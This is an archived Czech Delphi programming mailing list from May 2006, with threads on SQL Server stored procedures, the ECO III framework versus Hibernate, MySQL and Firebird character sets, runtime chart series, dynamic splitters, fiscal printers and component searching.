ulozenou proceduru mam v Microsoft SQL Serveru 2000

kdyz v ulozene procedure mam jeden SELECT, tak se mi v pohode vrati data do aplikace, ktere potom muzu v gridu zobrazit.
Ale kdyz v ulozene procedure napisu napr tohle:
select *
into #temp
from tabulka2
select tabulka1.*
from tabulka1
inner join #temp on tabulka1.klic = temp.klic
drop table #temp

tak se mi vrati prazdna mnozina dat, metoda TADOStoredProc.RecordCount vraci -1.

Proc to nevraci vysledna data ?

Letal

ECO III

[*] Lukas Barton <lukas(zv)cnawr(tec)cz> - 09.5.2006 11:11:40

kejval.delphi(zv)centrum(tec)cz wrote:

>Ahoj,

OCL je soucasti standardu MOF nikoliv UML. Posledni verze MOF je 2.0 z
ledna 2006. OCL se pouziva ve specifikaci UML (pomoci MOF).
OCL neni urcen jen k psani dotazu. Pouze se k tomu da vyuzit. Borland
implementuje rozsirenou verzi OCL, od OCL potom odvozule sve vlastni ASL
pro prasi metod. Je to ovsem ponekud nedokonale, chybi v tom napriklad
aritmetika (ta chybi i v UML 2.0 Action Semantic).

> [...]
>

> Dalsi problem jsem videl v tom, ze objekty, ktere jsou dedene, se do DB ukladaji tak, ze vzdy plni tabulku predka a do tabulky potomka, pridavaji jen udaje, o ktere se lisi predek s potomkem, coz z hlediska optimalizace nemusi byt vzdy vhodne. Pro tento pripad se ale v Eco da pouzit abstraktni trida predka a potomci se pak ukladaji tak, jak byl clovek zvykly v relacnim modelu, takze opet zadny problem.

Takove veci resi i jine pokrocile frameworky pro jine platformy, napr.
Hibernate a HQL. Proti Hibernatu jsou perzistencni schopnosti ECO
frameworku ve spouste veci nedostatecne (napr. delete s where podminkou
bez nacitani objektu z databaze....). Mimochodem uz nejakou dobu
existuje port Hibernatu pod .NET.

> [...]
>B se da monitorovat, takze optimalizovani indexu, opet zadny problem. Posledni uskali by mohlo byt jen v tom, ze se v Eco nedaji pouzivat ulozne procedury. Misto toho se objekty (data) budou zpracovavat az na urovni Eco => muze vzniknout rozdil mezi rychlosti prislusne DB a aplikacniho serveru, ktery bezi pod .Net. Tento rozdil zatim neumim posoudit, ale chystam se na nejake testy pro vetsi data, takze az budu neco mit, muzu dat vedet.

Toto Hibernate umi skvele ;-)

>I kdyz na zacatku jsem mel take pochybnosti, ze to pro velke aplikace nemuze fungovat, tak ted uz se zacinam priklanet k nazoru, ze vyhody Eco se projevi plne az u slozitejsich a datove obsahlych aplikaci, kdy se vyplati i ta pomerne vyskoka investice do Eco :-(

Uvedomte si, kolik stoji jeden clovekomesic prace kvalifikovaneho
programatora. 2 mesicni platy cenu ECO frameworku hrave prevysuji.
A kdyz uz vam tolik vadi jeho cena muzete zkusit J2EE aplikace, kde muze
byt investice i 0. (OpenMDX, AndroMDA na transformace a MagicDraw apod.
na modelovani).

Adonis - "Z ulozene procedury se nevraci do aplika

predpokladam ze bude potrebne nastavit SET NOCOUNT ON na zaciatku
procedury a SET NOCOUNT OFF pred samotnym selectom.

--
Martin Cajbik
SCT s.r.o. Kosice

ECO III

[*] kejval.delphi(zv)centrum(tec)cz - 09.5.2006 13:29:50

> [...]
> A kdyz uz vam tolik vadi jeho cena muzete zkusit J2EE aplikace, kde muze
> byt investice i 0. (OpenMDX, AndroMDA na transformace a MagicDraw apod.

Ja jsem mozna jednim z mala, kdo si to uvedomuje. Mozna prave proto se o tuto technologii tak zajimam.
Pro nasi firmu je to mozna jedina moznost, jak rychle a kvalitne napsat rozsahlou aplikaci (min. verze 6let
vyvoje) s podporou vice DB a zaroven podporou winform i webform klientu v pomerne malem vyvojovem
tymu. Navic, aby zavislost na pouzite platforme byla co nejmensi, za 6 let se toho urcite zase mraky zmeni a
nechtel bych znovu zacinat od zacatku, jako to hrozi ted :-(

> [...]
> frameworku ve spouste veci nedostatecne (napr. delete s where podminkou
> bez nacitani objektu z databaze....). Mimochodem uz nejakou dobu

Hibernat vubec neznam. Nejak si to neumim predstavit. To jako model udelam v Hibernatu a pak pomoci
dll s tim pracuju treba ve VS ? Nebo je to nejaky plug-in do VS ?

S pozdravem
ing. Richard Kejval
mobil: 602477679
http://www.icsoftware(tec)cz

ECO III

[*] Lukas Barton <lukas(zv)cnawr(tec)cz> - 09.5.2006 13:47:51

kejval.delphi(zv)centrum(tec)cz napsal(a):

> Hibernat vubec neznam. Nejak si to neumim predstavit. To jako model udelam v Hibernatu a pak pomoci
> dll s tim pracuju treba ve VS ? Nebo je to nejaky plug-in do VS ?

(N)Hibernate je to LGPL.
Jak to funguje pod .NET moc nevim :-( Zabyvam se ted vyvojem v Java.
Netusim jak moc Microsoft dotahl svuj koncept Software Factories (viz
rozhovor se Stevem Cookem -
http://www.dnjonline.com/login.aspx?ReturnUrl=/article.aspx?ID=mar05_stevecook).
Zakladni myslenky jsou velmi zajimave a ja se klonim na jejich stranu.
DSL je to lepsi nez UML profily (DSM).

Moznosti Java (J2EE) psat ruzne druhy klientu nad stejnou 2 vrstvou jsou
velmi podobne.

V modelovani ma z historickych duvodu naskok Java (UML "patri" IBM,
ktere prosazuje Javu).
Pro Java existuji modelovaci nastroje, ktere umi vygenerovat kostru J2EE
aplikace. Pro Hibernate zatim nic takoveho neni :-(
(funguje jen reverse engineering existujici databaze nebo lze pouzit
AndroMDA, ktere jeste ale neni 100% dotazene).

Mne by na ECO vadilo, ze je jeste neni zrale. Nekdy je lepsi pouzit
heterogenni reseni (vice ruznych frameworku) nez jeden, ktery umi
"vsechno". Zvlaste pro velke aplikace a EAI...> S pozdravem
> ing. Richard Kejval
> mobil: 602477679
> http://www.icsoftware(tec)cz

Adonis - "Z ulozene procedury se nevraci do aplika

[*] Petr Kejval <petr.kejval(zv)worldonline(tec)cz> - 09.5.2006 14:01:52

Strilim od boku, co zkusit ADOStoredProc.NextRecordset a pak
TADOStoredProc.RecordCount.

Petr Kejval

> [...]
> drop table #temp
>
> tak se mi vrati prazdna mnozina dat, metoda TADOStoredProc.RecordCount

OT: kodovani v MySQL

[*] Petr Berek <sojokl(zv)seznam(tec)cz> - 09.5.2006 14:29:55

Ahoj,
omlouvam se za ot, ale chci se zeptat, jestli nekdo nevite, jak nastavit
kodovani v mysql. Vzdycky mi to vyhodi sql chybu: Illegal mix of collations.
Dival jsem se hodne na netu, ale vypada to, ze nezabira ani prikaz set
character set.
Nemate s tim nekdo zkusenost?

kodovani v MySQL

[*] Martin Pisarik <martin.pisarik(zv)seznam(tec)cz> - 09.5.2006 15:15:58

Jde o to, ze je treba mit stejny kodovani vsech tabulek a poli, ktera
vstupuji do dotazu.
U MySQL je tento princip:
Nejake kodovani ma server, a to je pouzito jako defaultni kodovani u
vytvarenych databazi, pokud neni receno jinak.
Nejake kodovani ma databaze a to je pouzito pri vytvareni tabulek, pokud
neni receno jinak
Nejake kodovani ma tabulka, a to je pouzito jako kodovani u jejich fieldu,
pokud neni receno jinak.

Zmena kodovani fieldu resp tabulky provedes klasicky pomoci ALTER

ALTER TABLE tbl_name
[[DEFAULT] CHARACTER SET charset_name] [COLLATE collation_name]

Nejak podobne bude i ALTER DATABASE...

Set character set, ti zmeni charset pro to vlakno, ktery jej vykona, takze
nema globalni efekt. Ja volam set character set pri pripojeni klienta k DB
serveru abych mu rekl, jake kodovani budu pouzivat.

nastaveni defaultniho charsetu a collation je v my.cnf, pokud mas ten server
pod svym vlivem. defualtne je tam swedish - pochopitelne ;-)

> [...]
> collations.
> Dival jsem se hodne na netu, ale vypada to, ze nezabira ani prikaz set

[*] Cizek.Milan <cizek.milan(zv)seznam(tec)cz> - 09.5.2006 16:00:01

> Nemate s tim nekdo zkusenost?

http://molhanec.net/mysql_cestina_minifaq.html

kodovani v MySQL

[*] Petr Berek <sojokl(zv)seznam(tec)cz> - 09.5.2006 16:02:01

Musel jsem si to precist asi desetkrat, ale pak me napadlo, jak tady pises,
ze nastavujes kodovani po pripojeni, tak ja to mel pred pripojenim, to byla
chyba.
Diky

On 5/9/06, Martin Pisarik <martin.pisarik(zv)seznam(tec)cz> wrote:

> [...]
> nema globalni efekt. Ja volam set character set pri pripojeni klienta k DB
> serveru abych mu rekl, jake kodovani budu pouzivat.

Zjisteni UserName po zmene

[*] tantonin(zv)cbox(tec)cz <tantonin(zv)cbox(tec)cz> - 09.5.2006 21:08:22

Tak jsem na to uz prisel, mozna se to bude nekomu nekdy hodit:
interface

function NetUserGetInfo (serverName, userName : PWideChar; level :
Integer; var buffer : PByte) :Integer; stdcall;
function GetUserFullName(AUserName:WideString):WideString;

implementation

uses Windows;

function NetUserGetInfo; external 'NETAPI32.DLL';

function GetUserFullName(AUserName:WideString):WideString;
var
LServer : WideString;
LUser : WideString;
Llevel : cardinal;
LSize:integer;
LBP: PByte;
LPFullName: PWideChar;
type
USER_INFO_20 = record
usri20_name : PWideChar;
usri20_full_name : PWideChar;
usri20_comment : PWideChar;
usri20_flags : Integer;
usri20_user_id : Integer
end;
PUSER_INFO_20 = ^USER_INFO_20;
begin
LServer:='';
LUser := AUserName;
Llevel:=20;
if NetUserGetInfo (PWideChar (LServer), PWideChar (LUser), Llevel,
LBP) = 0 then
begin
LSize := (lstrlenW (PUSER_INFO_20 (LBP)^.usri20_full_name) + 1) *
sizeof (WideChar);
GetMem(LPFullName,LSize);
lstrcpyW (LPFullName,PUSER_INFO_20 (LBP)^.usri20_full_name);
result:=LPFullName;
FreeMem(LPFullName);
result:=AUserName;
end;

tantonin(zv)cbox(tec)cz napsal(a):
> Dobry den,
> Jmeno uzivatele prihlaseneho do systemu zjistime volanim API fce
> GetUserName. Po Change my name funkci Change an account tato fce nadale
> vraci puvodni jmeno uzivatele. Nevite nekdo, ktera API fce vraci toto
> nove jmeno.
> dekuju za pomoc.

ECO III

[*] Zbysek Hlinka <konference(zv)hlinka(tec)cz> - 10.5.2006 07:51:09

Jsem si toho vedom a souhlasim.

> [...]
> priklanet k nazoru, ze vyhody Eco se projevi plne az u
> slozitejsich a datove obsahlych aplikaci, kdy se vyplati i ta

Jde mi spis o to, ze mezi DB a programatorem lezi dalsi vrstva, ktera ma sve
naroky a svou rezii. Pokud bych tedy napriklad potreboval sbirat data z
nejakeho zarizeni, ktere jich muze chrlit velke mnozstvi (vyrobni nebo
kontrolni linka, ...), zadne podobne technologie bych si neriskl pouzit.
Podobne, pokud bych potreboval vycist vetsi objem mensich dat k nejakemu
zpracovani (z cehoz by mohlo vzniknout velke mnozstvi malych objektu),
hledal bych nejprve cestu, jak to poresit v ramci ulozene procedury - takze
opet ne-e.

Na druhou stranu musim rict, ze pokud vyse popsane problemy nenastanou,
pracuje se s takovymito technologiemi docela prijemne. ;)

ECO III

[*] Lukas Barton <lukas(zv)cnawr(tec)cz> - 10.5.2006 08:33:12

Zbysek Hlinka wrote:

> [...]
>hledal bych nejprve cestu, jak to poresit v ramci ulozene procedury - takze

Vykonosti bych se u ECO opravdu obaval.
Neexistuje dost dlouho, nema dostatecnou uzivatelskou zakladnu,....
(srovnejte se mnou uvadenym Hibernatem nebo J2EE a CMP).
V konferenci o Java se otazka rezie resila pro webove sluzby (ve
srovnani s trad. RPC) a tam uz pouziti v systemech kritickych na vykon
existuji.
Jinak asi neni problem resit tu realtime cast samostatnym modulem, ktery
nepouziva ECO.

Firebird a znakova sada ve vystupu ulozene procedu

[*] pilifs <pilifs(zv)seznam(tec)cz> - 10.5.2006 09:17:17

Zdravim ve spolek,
mam DB v ISO8859_2.

Pouziji-li tento vyber: SELECT UPPER(Nazev) FROM Tabulka
tak nazvy se vypisou vcetne diakritiky spravne - vse velke.

Pokud ovsem vytvorim jenoduchou proceduru, kde nedelam nic jineho nez
vyse uvedeny select ale bez UPPER:
create procedure sp_Tabulka(
nazev varchar(60)
as
begin
for select nazev from tabulka do
suspend;
end
a tuto pak zavolam SELECT UPPER(Nazev) FROM sp_Tabulka
tak se mi na velka pismena prevedou jen znaky bez diakritiky, ostatni
zustano male.

Pri deklaraci procedury (i tabulky) jsem zkusil take explicitne
definovat znakovou sadu, ale to take nepomohlo.

Nevite kde by mohl byt zakopany pes?

Delphi 5, Firebird 1.5.2, WinXP

Firebird a znakova sada ve vystupu ulozene procedu

[*] Jiri Cincura <diskuze(zv)cincura(tec)net> - 10.5.2006 09:45:19

On 10.5.2006 9:17 pilifs wrote:
> [...]
>
> Pri deklaraci procedury (i tabulky) jsem zkusil take explicitne
> definovat znakovou sadu, ale to take nepomohlo.

A neni problem v tom, ze app v Delphi bude nejspise Win1250? Zkus
explicitni konverzi, pripadne prekontroluj, jestli je vybran charset
clienta pri pripojovani.

http://www.cincura.net/

Registrace D7.

Po zkolabovani hard disku jsem musel znovu nainstalovat D7. Aktivacni klice samozrejme mame takze Delphi bezi v pohode, jen jako neregistrovana verze. A dotaz - k cemu vlastne potrebuju registraci kdyz je to zaplacene a pomoci klicu aktivovane? Tedy krome toho, ze mi pri spusteni zmizi cerveny text "Unregistered"? Ma "neregistrovanost" nejaky vliv na funkcnost vytvorenych programu?

Z.Kalhous
ToWare s.r.o.

Firebird a znakova sada ve vystupu ulozene procedu

[*] pilifs <pilifs(zv)seznam(tec)cz> - 10.5.2006 10:43:23

> A neni problem v tom, ze app v Delphi bude nejspise Win1250? Zkus
> explicitni konverzi, pripadne prekontroluj, jestli je vybran charset
> clienta pri pripojovani.

Neni to jen v Delphi. Pristupuji na to take z PHP.
Zkousel jsem to napr. z IBManageru, v pripojovacim retezci nastavuji
WIN1250. Co mne mate je prave ten rozdil "selectu" z tabulky a z ulozene
procedury. Jsem z toho jelen.

Explicitni konverzi? To jako treba: SELECT upper(cast(Nazev as
varchar(10) character set WIN1250)) ...
To mi take nepomohlo :-(

Registrace D7.

[*] Ludek <konference(zv)sales(tec)cz> - 10.5.2006 13:05:35

From: "Kalhous" <kalhous(zv)eu(tec)cz>
> [...]

preinstalovat tak narazis na problem. Po prekroceni toho poctu je pak treba
napsat na technickou podporu a zadat o reaktivaci.

Petr Vones

Firebird a znakova sada ve vystupu ulozene procedu

[*] Venca Zaruba <zaruba(zv)elastoform(tec)cz> - 10.5.2006 11:25:27

> [...]
> a pomoci klicu aktivovane? Tedy krome toho, ze mi pri spusteni zmizi
> cerveny text "Unregistered"? Ma "neregistrovanost" nejaky vliv na

Po nejakem case Te vyzve k registraci a IDE nejde spustit. Pak je v bin prg
D7reg... Vliv na app jsem nepostrehl.

Jednoduche RTF s odsazenymi odstavci

[*] Karel Kral <kralkonf(zv)purusmeda(tec)cz> - 10.5.2006 11:21:27

Ahoj,
potrebuju v Rft vytvorit nekolik odstavcu, z nichz kazdy bude zacinat
nejakou znackou a bude vice odsazeny nez ten nad nim (simulace stromu).

Puvodni idea byla, ze si to udelam ve Wordu, ulozim jako Rtf a pak se
podivam, co Word vytvoril. Ten ale ze 3 odstavcu o 10 pismenech vytvoril
10 KB textu, ze ktereho nedokazu vydolovat to, co potrebuju. Nemuzete me
nekdo navest na nejaky spravny odkaz?
Karel Kral, reditel IT / IT manager
PURUS-MEDA, s.r.o., Palackeho 174, 621 00 Brno, CZ
E-Mail: kral(zv)purusmeda(tec)cz

Registrace D7.

Registrovanost nema vliv na programy. Po instalaci mych D6 jsem je chtel registrovat, ale v D6 byly nejake problemy s registraci, tak jsem to nechal neregistrovane. No a po cca 6 mesicich se Delphi odmitly spustit.
V D7 je registrace opravena, neni duvod neregistrovat.

Dynamicke vytvareni splitteru

[*] Ludek <konference(zv)sales(tec)cz> - 10.5.2006 14:33:41

Zdravim,
Mam problem, dynamicky vytvarim na ScrollBoxu StringGridy a chtel bych mezi ne vlozit Splittery.
Pokud to na form nahazim rucne je vse OK ale pri dynamickem vytvareni za behu se mi to uplne rozhodi a splittery nejsou tam kde by mely byt.

Jak bych mel spravne postupovat.

Ludek

Dynamicke vytvareni splitteru

[*] Martin Pisarik <martin.pisarik(zv)seznam(tec)cz> - 10.5.2006 14:47:42

Nastavuj Top, popr. Left property tak abys dodrzel poradi Gridu a Spliteru,
tak teprv Allign a pak teprve Parent. Taky jsem se s tim potykal, ale
vyresil jsem to tim.
Taky jsem experimentoval s Realign();

[*] pilifs <pilifs(zv)seznam(tec)cz> - 10.5.2006 14:39:41

> [...]
> odpovidajici collate. Vypada to absurdne, zvlast kdyz
> collate na na sloupci definovano je, ale pomahalo to...viz

Jo, tak tohle presne pomohlo. Dik.
A jen tak mimochodem je mi nekdo schopen (nebo ochoten) vysvetlit proc
to tak je? Nebo to mam povazovat za vlastnost FB a uz s tim dal
neotravovat? ;-)

ChartException

[*] Hash <parizsky(zv)gmail(tec)com> - 10.5.2006 15:43:46

DDV,
nevi prosim nekdo jak v runtime priradit grafu Datasource ? Pri nasledujicim
kodu dostavam tuto vyjimku "ChartException: 'No ParentChart to validate
DataSource'", ale v pripade nastaveni v designu vse funguje jak ma.

QRChart je vlozen na formular v designu a zakladne nastaven.
Po uzivatelskem vyberu datoveho zdroje a typu grafu potrebuji provest:
<code>
lSeries1 := TLineSeries.Create(QRDBChart1);
lSeries1.DataSource := UData.QPrac; ---> ChartException :(
</code>

Diky za kazdou radu
Ladap

Delphi5 s updaty, QuickReport3.0.7, WinXP SP2

Delphi 8

[*] Jaroslav Nadhera <nadhera(zv)csh(tec)cz> - 10.5.2006 15:45:47

Potreboval bych nutne koupit licenci na Delphi 8 (nebo Delphi 7). Poradi mi
nekdo nejpruchodnejsi zpusob?

Jaroslav Nadhera

tel.: 242 486 998, fax: 242 486 970
e-mail: nadhera(zv)csh(tec)cz , WWW: http://www.csh(tec)cz
pobocka Ostrava: Nedbalova 14, 701 00 Ostrava
tel.: 597 578 698

ChartException

[*] Pavel Gazda <pavel gazda(zv)datasw(tec)cz> - 11.5.2006 07:30:53

Ahoj,

tak nejak jsem to kdysi delal v D6 pro zobrazeni:==========================================
procedure TGrafForm.AddLine(const InternalName,PublicName: String;const
BottomLeft: Boolean);
var
S : TLineSeries;
begin
if IndexOfSeries(InternalName )> -1 then
Exit;
S := TLineSeries.Create(Graf);
try
With S do
begin
Name := InternalName;
Title := PublicName;
ParentChart := Graf;
if BottomLeft then
begin
HorizAxis := aBottomAxis;
VertAxis := aLeftAxis;
HorizAxis := aTopAxis;
VertAxis := aRightAxis;
end;
ColorEachPoint:= True;
Marks.ArrowLength := 0;
Marks.Visible := False;
Marks.Clip := True;
Pointer.InflateMargins := True;
Pointer.Style := psRectangle;
Pointer.Visible := False; XValues.DateTime := True;
XValues.Name := 'X';
XValues.Multiplier := 1;
XValues.Order := loNone;

YValues.DateTime := False;
YValues.Name := 'Y';
YValues.Multiplier := 1;
YValues.Order := loNone;

end; { LineSeries }
except
S.Free;
{$IFDEF MSGERROR}
ShowMessage('AddLine - error');
Raise;
{$ENDIF}

placeny amater

> [...]
>
> lSeries1 := TLineSeries.Create(QRDBChart1);
> lSeries1.DataSource := UData.QPrac; ---> ChartException :(

Tisk na fiskalni tiskarne EPSON

[*] delphi(zv)mjsoft(tec)cz - 11.5.2006 07:58:55

Zdravim,

mam za ukol pro jednoho zakaznika rozchodit fiskalni tiskarnu FP-T88UC.
Jestli jsem to pochopil spravne, tak s fiskalnim modulem mohu komunikovat
pomoci dll, nebo pomoci ESC sekvenci. Co je lepsi? Zkousel jsem oboji, ale
zatim me nejde ani jedno. Nemate nekdo jednoduchy prikladek v Delphi, jen
tisk jednoducheho paragonu, to by me pomohlo.

Dekuji Karel V.

Dynamicke vytvareni splitteru

[*] Petr Daricek <petr.daricek(zv)seznam(tec)cz> - 11.5.2006 08:32:58

Ahoj,
a v cem je presne problem. Ja takove veci delam tak ze postupne vytvarim gridy a splitery. Grid zarovnam vlevo, spliter taky a pozici splitru nastavim Left := Grid.Left+Grid.Width;
Petr

Tisk na fiskalni tiskarne EPSON

[*] Franta Flinta <jarek2(zv)centrum(tec)cz> - 11.5.2006 08:44:59

pro primy tisk na tiskarnu u nas pouzivame komponentu RAW printer. potom
posilam primo esc sekvence na tiskarnu a ona si s tim uz poradi. co se
tyce ruznych standardu, tak staci kdyz "naucis" program 2 standardy
(oki,tally - pisu to proto, ze to tak nazyvame, mozna se v spravne
jmenuji jinak), ale s tim by problem byt nemel, protoze pro zakladni
veci maji oba standardy stejne esc sekvence (novy radek apod.)... na
internetu neni problem najit seznam esc sekv. i s tim co pachaji s
tiskarnou.
jeste me napada, ze muzes narazit na problemy s cestinou. tam ti muzou
pomoct funkce ze synapse pro prevod na jine kodovani, protoze (nevim jak
fiskalni) i nektere nove jehlickove tiskarny nepodporuji win1250, ale
kameniky nebo latin2.
cili v praxi to vypada tak, ze klient ma ve widlich nainstalovanou
obecnou tiskarnu(win98)/generic - text only(win2k), kde se ve
vlastnostech jeste nastavi "tisknout primo na tiskarnu" a jede se....
teda tiskne se...
franta flinta

delphi(zv)mjsoft(tec)cz napsal(a):

> [...]
>zatim me nejde ani jedno. Nemate nekdo jednoduchy prikladek v Delphi, jen
>tisk jednoducheho paragonu, to by me pomohlo.

[*] Martin Burle <mburle2(zv)volny(tec)cz> - 11.5.2006 08:24:58

> [...]
> zatim me nejde ani jedno. Nemate nekdo jednoduchy prikladek v Delphi, jen
> tisk jednoducheho paragonu, to by me pomohlo.

Ahoj, myslim, ze je lepsi pouzit Esc sekvence a komunikovat pomoci nejake
knihovny (Synaser). Lepe vidis/pochopis co se deje a mas to pod kontrolou.
Navic, fiskalnich tiskaren je vice druhu, nejenom Epson, a ne pro vsechny
typy jsou vytvoreny dll. Esc sekvence a formaty dat i dat jsou sice pro
kazdy typ uplne jine, ale zpusob komunikace je podobny - takze kdyz
zprovoznis Epson, muzes z hotoveho kodu pozdeji vyjit i pro jiny typ - a
nadavat, proc nekdo nejprve nevymyslel nejakou jednotnou specifikaci :-(

Ke komunikaci - epson ma prednastavenou rychlost 115200 (asi se da
prenastavit), na nizsich rychlostech se nespojis. Pokud ti funguje servisni
program, nemel by snad byt problem.

Moje zkusenost je takova, ze ceska dokumentace dodavana vyrobcem je skoro
nepouzitelna, protoze jsou ni jednak chyby, druhak dulezite veci chybeji -
pouzij anglickou verzi.

ChartException

[*] Hash <parizsky(zv)gmail(tec)com> - 11.5.2006 08:24:57

Nazdarek,
problem byl v tom ze je potreba nastavit lSeries1.ParentChart pred vlastnim
nastavenim DataSource.
Jednoduche ale potrapilo me to.

Dik
Ladap

On 5/11/06, Pavel Gazda <pavel_gazda(zv)datasw(tec)cz> wrote:

> Ahoj,
>
> tak nejak jsem to kdysi delal v D6 pro zobrazeni:
>
> ==========================================
> procedure TGrafForm.AddLine(const InternalName,PublicName: String;const
> BottomLeft: Boolean);
> var
> S : TLineSeries;
> begin
> if IndexOfSeries(InternalName )> -1 then
> [...]

TTimer bez VCL

[*] Jan Harman <jharman(zv)volny(tec)cz> - 11.5.2006 09:23:05

Zdravim vsechny,
prosim vas, nemate nekdo nejaky tip na komponentu timeru, ale bez
VCL? Dik. Honza

--
Konec stereotypni jizdy na draze - prvni in-line brusle do prirody!
Powerslide Nordic Trainer + brzda zdarma!

Dynamicke vytvareni splitteru

[*] Ludek <konference(zv)sales(tec)cz> - 11.5.2006 09:27:06

Od: "Milan Tomes" <delphi(zv)haida(tec)cz>
Komu: delphi-l(zv)clexpert(tec)cz
Predmet: Re: TTimer bez VCL
Datum: 11.5.2006 - 9:49:18

--
AKCE - Synephrine Thermo Tabs - 50% sleva na 2. baleni thermo
spalovace http://www.sportwave(tec)cz

TTimer bez VCL

[*] Milan Tomes <delphi(zv)haida(tec)cz> - 11.5.2006 11:27:15

Tak to udelej stejne jako ve VCL - vytvor si novou WndProc, ktera bude
prijimat zpravy WM_TIMER a ve zpracovani zavolas prislusnou metodu tridy...

Jan Harman napsal(a):
> [...]
> vytvoreni timeru, ale ma to trochu nesikovne zpetne volani, kteremu
> nelze predat "procedure of object", ale jen obycejnou proceduru.

Delphi 8

[*] Pavel P <pavel(zv)tvsp(tec)net> - 11.5.2006 11:45:17

Resil jsem ted stejny problem, tedy volal jsem do borlandu a bylo mi receno ze si u nich muzu koupit licenci bez medii, ale za cenu soucasnych delphi. Nejsem si moc jistej zda je o vyhodny, ale pokud na to jsou penize, je to asi nejsnazsi...
PP.

> [...]
> tel.: 242 486 998, fax: 242 486 970
> e-mail: nadhera(zv)csh(tec)cz , WWW: http://www.csh(tec)cz
> pobocka Ostrava: Nedbalova 14, 701 00 Ostrava

[*] Martin Burle <mburle2(zv)volny(tec)cz> - 11.5.2006 12:01:18

> [...]
> tyce ruznych standardu, tak staci kdyz "naucis" program 2 standardy
> (oki,tally - pisu to proto, ze to tak nazyvame, mozna se v spravne

Fiskalni tiskarna neni ani tak moc tiskarna, jako spise registracni
pokladna. Nejake udaje do ni posilas, a jine musis vycist. Kazdy vyrobce ma
sve ridici sekvence. Ano, daji se do ni posilat i klasicke ridici kody pro
zmenu velikosti pisma apod., ale jen nekdy a jen nektere, zalezi co vyrobce
povoli.

MB

TTimer bez VCL

[*] Radek Voltr <voltr(zv)eleasoftware(tec)com> - 11.5.2006 12:29:20

Posilam ti mailem zdrojak me ThTimer komponenty ktera pouziva pro casovani
thread, jinak se pouziva stejne.

Jedine co bych doporucil vyhodit je inicializace comu pokud ho nebudes
pouzivat
v ramci threadu, usetri to neco dat

[*] delphi(zv)mjsoft(tec)cz - 11.5.2006 12:57:22

> [...]
> daji se do ni posilat i klasicke ridici kody pro zmenu
> velikosti pisma apod., ale jen nekdy a jen nektere, zalezi co

Ano, to jsem z manualu take pochopil, ze se ovlada ten fiskal. Ale nevim
jak to rozchodit. Nejake ESC sekvence jsem tam podle dokumentace posilal,
ale nic to nedela. Nebyl by ukazkovy kod na par radku.

Dik Karel V.

Hledani komponent v dynamickem TForm

[*] Vladimir Ponechal <vponecha(zv)email(tec)cz> - 11.5.2006 13:39:25

Panove,

vytvorim si dynamicke formy, ktere potom zaplnim komponentama.

V application uz mam vlastni unit, ktery ma stejne procedury pro vsechny nove vytvorene formy. Objekty potom tyto porocedury sharuji. Tyto procedury vypadaji nejak podobne:

var
i : integer;
begin
for i := 0 to MainPanel.controlscount-1 do
begin
if MainPanel.Controls[i] is TEdit then
begin
nejaka akce...

V danou chvili resim dva problemy.
1.) Hledani objektu se mi zda byt docela neefektivni, protoze pokud mam objekt primo na formu, tak mi ho samozrejme nenajde. Nebo naopak, pokud mam objekt na jinem Tpanel atd... Kdyz chci hledat v celem formu a neohlizet se na to, kdo je parent. Jak na to?

2.) Kdyz je form dynamicky a chci jednu proceduru pouzivat pro vsechny, jak to mam udelat? Jak to mam nadefinovat v te procedure? Neco ve smyslu for i := 0 to SenderForm.controlcounts-1 ...

Nakopnete me prosim nekdo?

Diky moc,

Vl.

Hledani komponent v dynamickem TForm

[*] petr palicka <palicka.petr(zv)seznam(tec)cz> - 11.5.2006 13:51:26

Ahoj,

Vladimir Ponechal napsal(a):
> [...]
> i : integer;
> begin
> for i := 0 to MainPanel.controlscount-1 do

ja na neco takoveho pouzivam rekurzi:

procedure TfDataDetailContainer.InitFrames(Sender: TObject);
var
i, j: Integer;
twc: TWinControl;
begin
if Sender is TWinControl then
twc:=Sender as TWinControl
else
EXIT;
i:=twc.ControlCount;
for j:=0 to i-1 do
if twc.Controls[j]is TfDataDetail then
TfDataDetail(twc.Controls[j]).FrameCreate(twc.Controls[j])
else if twc.Controls[j]is TWinControl then
InitFrames(twc.Controls[j]);

Hledani komponent v dynamickem TForm

[*] Jaroslav Pivonka <jpivonka(zv)centrum(tec)cz> - 11.5.2006 13:57:27

Udelej si nejaky smysluplny system pojmenovani toho vseho a pak hashovanou
tabulku pointeru jako kdyz pises tabulku identifikatoru v kompilatoru,
Dokazano jest (Knuth, 1968), ze to jede O(1) s tim, ze pri zaplneni tabulky
do 80% je prumerny pocet pristupu pod 3. Tvoje chyba je v tom linearnim
cyklu for i := 0 to MainPanel.controlscount-1 do ktery je O(n). Lidi hazeji
komponenty na formy misto aby se naucili programovat.

> [...]
> Zkontrolovano Antivirovym systemem AVG.
> Verze: 7.1.392 / Virova baze: 268.5.6/336 - datum vydani: 10.5.2006

[*] Petr Zahradnik <clexpert(zv)clexpert(tec)cz> - 11.5.2006 14:13:28

Puvodni zprava ze dne 11.5.2006:

> [...]
> nevim jak to rozchodit. Nejake ESC sekvence jsem tam podle
> dokumentace posilal, ale nic to nedela. Nebyl by ukazkovy kod na par

No a ty k tomu nemas servisni program, ktery porad ukazuje primo
probihajici komunikaci a muzes se podivat, co se kam posila, kdyz si
nejsi jisty?

Hledani komponent v dynamickem TForm

[*] Martin Pisarik <martin.pisarik(zv)seznam(tec)cz> - 11.5.2006 14:25:29

Jestli chces neco provest se VSEMA komponentama v nejakem kontejneru tak for
je idealni reseni, protoze stejne musis projit vsechny a neco s nimi udelat.
Pokud HLEDAS v kontejneru nejakou komponentu, tak sekvencni pruchod neni
idealni, ale nechapu proc bys mel hledat konponentu?
Pokud ji znas, tak prece muze primo s ni i pracovat.
To by chtelo trochu rozepsat. To jako mas jeji nazev a hledas ji podle
nazvu, nebo co? Pak by mozna nejaky hashovany pole pomohlo, ale jsem
presvedcen, ze se snazis resit nejaky problem, ktery neexistuje. K cemu to
konkretne chces?

UNICODE,prenos z access do MYSQL

[*] Venca Zaruba <zaruba(zv)elastoform(tec)cz> - 11.5.2006 14:17:28

Hi *,
O5 mam problem s UNICODEM. Mam app, ktera edituje multijazycnou databazi (CZ,DE, RU,SW...),
ktera je vytezovana na www (MYSQL - PHP). Problem mam s RU (nemci se vsema znakovyma vymozenostma jsou OK).
Data na lokalu jsou v *.mdb a jsou OK. V aplikaci je edituji pomoci TNT a tez je vse OK.
Pak je pomoci ZEOS prenasim do mysql a misto RU znaku mam "?".
Pri zadani rustiny primo do MYSQL (phpadmin) je vse OK. Pro kodovani pouzivam UTF-8.
Pri krokovani jsem narazil na toto:

For i:=1 to Original.FieldCount-1 do
begin
Kopie.FieldS[i].Value:=Original.Fields[i].Value;
end;

Original je TWideStringField
